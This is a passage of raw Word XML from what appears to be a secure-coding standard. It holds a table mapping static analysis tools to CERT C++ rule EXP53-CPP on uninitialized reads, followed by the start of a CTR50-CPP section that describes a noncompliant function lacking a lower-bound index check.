        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="486E9681" w14:textId="36A7E6BA" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId129" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5590A5CF" w14:textId="7CF3D955" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2023.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2935D2F6" w14:textId="4BC967EA" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_CPP-EXP53-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10EAFC44" w14:textId="24898B7B" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Avoid use before initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="64F0AC3A" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA053B5" w14:textId="050893B3" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId130" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Insure++</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64B7FC40" w14:textId="3516F12D" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0155179E" w14:textId="4C2F1933" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3877BF3F" w14:textId="381B010E" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Runtime detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="2E5EE7DD" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000C184C" w14:textId="64415FD8" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId131" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B0CCC4F" w14:textId="0F9F7118" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6506F573" w14:textId="25FE582A" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId132" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C++: EXP53-CPP</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0914BD74" w14:textId="77777777" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">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7BB4B0AD" w14:textId="77777777" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">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Non-initialized variable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DEADD20" w14:textId="77777777" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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Non-initialized pointer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="570322E7" w14:textId="1631ED45" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Rule partially covered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="6F097F0D" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30EAE915" w14:textId="14681EF9" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId133" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>PVS-Studio</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EFCA358" w14:textId="7979050E" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D134334" w14:textId="32C3D8AE" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId134" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Strong"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>V546</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008D1EE0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId135" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Strong"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>V573</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008D1EE0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId136" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V614</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008D1EE0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId137" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V670</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008D1EE0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId138" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V679</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008D1EE0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId139" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V730</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008D1EE0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId140" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Strong"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>V788</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008D1EE0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId141" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V1007</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="008D1EE0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId142" w:history="1">
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V1050</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="670612BB" w14:textId="77777777" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D1EE0" w14:paraId="2EE1B702" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F1CB00" w14:textId="5A32EEAB" w:rsidR="008D1EE0" w:rsidRDefault="00000000" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId143" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="008D1EE0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>RuleChecker</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C057DF1" w14:textId="2E24A766" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19BD5035" w14:textId="03B6A52E" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>uninitialized-read</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EBAC9F0" w14:textId="35629A79" w:rsidR="008D1EE0" w:rsidRDefault="008D1EE0" w:rsidP="008D1EE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rP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28" w:name="_Toc52464068"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 10</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="16272DCB"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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57F68CB" w:rsidR="00381847" w:rsidRDefault="005B320D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Memory Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="72961103" w14:textId="5C794E22" w:rsidR="00381847" w:rsidRDefault="005B320D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CT</w:t>
            </w:r>
            <w:r w:rsidR="001A351E">
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>050</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02179BF3" w14:textId="1444A86D" w:rsidR="00381847" w:rsidRDefault="00EF058D">
            <w:r w:rsidRPr="00EF058D">
              <w:t>Guarantee that container indices and iterators are within the valid range</w:t>
            </w:r>
            <w:r w:rsidR="006627E0">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="006627E0" w:rsidRPr="006627E0">
              <w:t>Ensuring that array references are within the bounds of the array is almost entirely the responsibility of the programmer. Likewise, when using standard template library vectors, the programmer is responsible for ensuring integer indexes are within the bounds of the vector.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EBCA8F9" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847">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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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DB1E972" w:rsidR="00F72634" w:rsidRDefault="00FB6591" w:rsidP="00A72503">
            <w:r w:rsidRPr="00FB6591">
              <w:t xml:space="preserve">This noncompliant code example shows a function, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FB6591">
              <w:t>insert_in_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FB6591">
              <w:t>table</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB6591">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FB6591">
              <w:t xml:space="preserve">), that has two int parameters, pos and value, both of which can be influenced by data originating from untrusted sources. The function performs a range check to ensure that </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FB6591">
              <w:t>pos</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FB6591">
              <w:t xml:space="preserve"> does not exceed the upper bound of the array, specified by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FB6591">
              <w:t>tableSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB6591">
              <w:t>, but fails to check the lower bound. Because pos is declared as a (signed) int, this parameter can assume a negative value, resulting in a write outside the bounds of the memory referenced by table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="23207A43" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6374D5EB" w14:textId="77777777" w:rsidR="00FB6591" w:rsidRDefault="00FB6591" w:rsidP="00FB6591">
            <w:r>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cstddef</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="143F7283" w14:textId="77777777" w:rsidR="00FB6591" w:rsidRDefault="00FB6591" w:rsidP="00FB6591">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6118D2C5" w14:textId="77777777" w:rsidR="00FB6591" w:rsidRDefault="00FB6591" w:rsidP="00FB6591">
            <w:r>
